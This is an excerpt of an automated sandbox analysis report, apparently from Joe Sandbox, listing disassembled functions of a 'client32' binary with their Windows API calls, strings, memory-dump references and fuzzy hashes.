WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111336DE

Strings

MiniDump, xrefs: 11133657

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
Instruction ID: 2f84af38c29f256cee2cc1ffc865d9f7da14dec3b61b68d8c3c8670bee4004e0
Opcode Fuzzy Hash: 6a23f2a9de3140760915938baa0324fa1df2816b93868bf2c807555fc190a424
Instruction Fuzzy Hash: D8112CB29242257FD700DBA89C85F9AF7989B44739F104234F924D73C8EA71E600CBB9

Function 11135DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11135DCF
wsprintfA.USER32 ref: 11135E06

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

i < _tsizeof (buf), xrefs: 11135E20
#%d, xrefs: 11135E00
..\ctl32\util.cpp, xrefs: 11135E1B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
Instruction ID: 856d5068e0010e8f5460d586c9b7f9a33cbca200768314754285dae5934ecd8a
Opcode Fuzzy Hash: 0eaf82f8904d0e89491818307a0e8bd6524ff2e2b8cd6c2dac824670f33672ca
Instruction Fuzzy Hash: 9111E9FAD101296BC710DA65DD85F9AF76C9B84719F004164EF04B7149EA30AA0587A4

Function 11102870 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11102889

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

wsprintfA.USER32 ref: 111028A4

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

_memset.LIBCMT ref: 111028C7

Strings

Can't alloc %u bytes, xrefs: 1110289E
..\ctl32\Refcount.cpp, xrefs: 111028B5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: 2bcb857e8223da502cf959c8892815a9341cedcf980b4e674e7e168562959144
Instruction ID: 86aa9e5bcbae8f8c2bc6393a2fe4af4140ad48230e9cd7b97cb8b02b288cada0
Opcode Fuzzy Hash: 2bcb857e8223da502cf959c8892815a9341cedcf980b4e674e7e168562959144
Instruction Fuzzy Hash: 24F0F6BAE0012867C7109AA5AC41FDFF7AC9F82608F4000A9FE0467142EA70AB01CBE5

Function 1102FC90 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1102FD46

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

m_pDoInv == NULL, xrefs: 1102FCC3
580913, xrefs: 1102FD27
%s%s.bin, xrefs: 1102FD40
clientinv.cpp, xrefs: 1102FCBE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$580913$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-2675951767
Opcode ID: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
Instruction ID: 34a2fd1cf9ce17e411a54b0388ef97a3e351311eb6f0b41dc2420f2fea7f0bd6
Opcode Fuzzy Hash: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
Instruction Fuzzy Hash: 022190B5E00709AFD710DF25CC80BABB7E5FB44758F10852DEC5597781EA34A8008B51

Function 6CC82727 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CC82735

Part of subcall function 6CC7F8CB: __FF_MSGBANNER.LIBCMT ref: 6CC7F8E4
Part of subcall function 6CC7F8CB: __NMSG_WRITE.LIBCMT ref: 6CC7F8EB
Part of subcall function 6CC7F8CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CC8B131,6CC84BF1,00000001,6CC84BF1,?,6CC8D1B5,00000018,6CCA5558,0000000C,6CC8D245), ref: 6CC7F910

_free.LIBCMT ref: 6CC82748

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ab555f8db942ecc6aab75854cfe63d628f18c4bb507832d7399e1df42861d85d
Instruction ID: 77e101b96a986b653e2237aa1623a5699d4c46b666ebc962e036787e6459aa2e
Opcode Fuzzy Hash: ab555f8db942ecc6aab75854cfe63d628f18c4bb507832d7399e1df42861d85d
Instruction Fuzzy Hash: 7311C432646611BBCF111F7BE81C68B3FB5AB4136CB18512AF9089BA40FB34884083A0

Function 11133AC0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11134108,00000000,?,11134108,00000000), ref: 11133ADC
__strdup.LIBCMT ref: 11133AF7

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

Part of subcall function 11133AC0: _free.LIBCMT ref: 11133B1E

_free.LIBCMT ref: 11133B2C

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

CreateDirectoryA.KERNEL32(11134108,00000000,?,?,?,11134108,00000000), ref: 11133B37

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 3358c8a4a2822ede092e44ac4656f97f9904e5a45daf7976b2d272560cb6ae63
Instruction ID: aa2e0163475f2b812501e4eb99de98075b3d8b88882ce7cf24685a9f1b499ad4
Opcode Fuzzy Hash: 3358c8a4a2822ede092e44ac4656f97f9904e5a45daf7976b2d272560cb6ae63
Instruction Fuzzy Hash: 8801F977B381125AF301157D6D06BBBBB898BC26BEF084131F81DC6388F656E40641AA

Function 11134C40 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

wsprintfA.USER32 ref: 11134C6E
wsprintfA.USER32 ref: 11134C84

Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A78400,?), ref: 11132717
Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
Part of subcall function 11132680: CloseHandle.KERNEL32(00000000), ref: 1113273F

Strings

NSM.LIC, xrefs: 11134C53
%sNSM.LIC, xrefs: 11134C68
%sNSA.LIC, xrefs: 11134C7E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
Instruction ID: 9c67431b43c70ff94c5574da105f7ccddca851e71d4d99b5eda6b1c9b98572d3
Opcode Fuzzy Hash: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
Instruction Fuzzy Hash: 180124BAD0420966CB10DBA19C45FEBF7AC8F4421DF000196EC1997144ED20BA04CBD5

Function 110F6330 Relevance: 7.5, APIs: 5, Instructions: 44threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11083B60: UnhookWindowsHookEx.USER32(?), ref: 11083B83

GetCurrentThreadId.KERNEL32 ref: 110F634B
GetThreadDesktop.USER32(00000000), ref: 110F6352
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110F6362
SetThreadDesktop.USER32(00000000), ref: 110F636F
CloseDesktop.USER32(00000000), ref: 110F6376

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentHookOpenUnhookWindows
String ID:
API String ID: 2408936056-0
Opcode ID: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
Instruction ID: 33a7dbd132630a5f65e042d10e45e308f8ac0c24a7c2882920133d3588b1205b
Opcode Fuzzy Hash: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
Instruction Fuzzy Hash: 5EF0C87BF056252FD70267B19C49B7F7A169FC5669F080024F5055B240FF14750183E6

Function 11132680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A78400,?), ref: 11132717
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
CloseHandle.KERNEL32(00000000), ref: 1113273F

Strings

", xrefs: 111326CE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
Instruction ID: 440ab7f6f978ac94d5fbb5a1369e97e0d7071da94511d4ee7fb8c05e869e7eaa
Opcode Fuzzy Hash: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
Instruction Fuzzy Hash: B6218E31A04288AFE712DE38DD54BD5BB94AF86325F2041E4EDD5DB1C9DA709A48C750

Function 1102BA80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,2F623E72,75922EE0,?,00000000,1117AD0B,000000FF,?,1102E64C,Client,UseIPC,00000001), ref: 1102BB37

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102BAFA

Strings

DisableGeolocation, xrefs: 1102BAAE
Client, xrefs: 1102BAB3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
Instruction ID: 909c90258048426ad92c62856d2e7a2749a5947dbc84b876734554e22f69ddca
Opcode Fuzzy Hash: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
Instruction Fuzzy Hash: 3E21DF34A41760BBEB21DB24CC45F9AF7E4A708B18F10426AFD255B3C4EBF4A4008B84

Function 11025F10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F3A

Part of subcall function 110C3120: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
Part of subcall function 110C3120: LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184

TranslateMessage.USER32(?), ref: 11025F50
DispatchMessageA.USER32(?), ref: 11025F56

Strings

Exit Msgloop, quit=%d, xrefs: 11025F69

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
Instruction ID: 458663acd1e32bc52ab21155f198d3aa4dad7224c1f0df94b4fde6d061364d2b
Opcode Fuzzy Hash: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
Instruction Fuzzy Hash: D0F0FC77E111156FDA00DAD59CC1FEFF37CAB84615FC08165EE1593148F631B40587A1

Function 6CC63AB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CC63AC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CC6774D,00000000,?,6CC6774D,00000000,?,00000FA0,?), ref: 6CC63AE4
SetLastError.KERNEL32(00000078,00000000,?,6CC6774D,00000000,?,00000FA0,?), ref: 6CC63AED

Strings

EnumProcessModules, xrefs: 6CC63ABE

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 778c6ba0e171d79eba0595c32230e2edbb25507cad38a6c54ee084687d80ca16
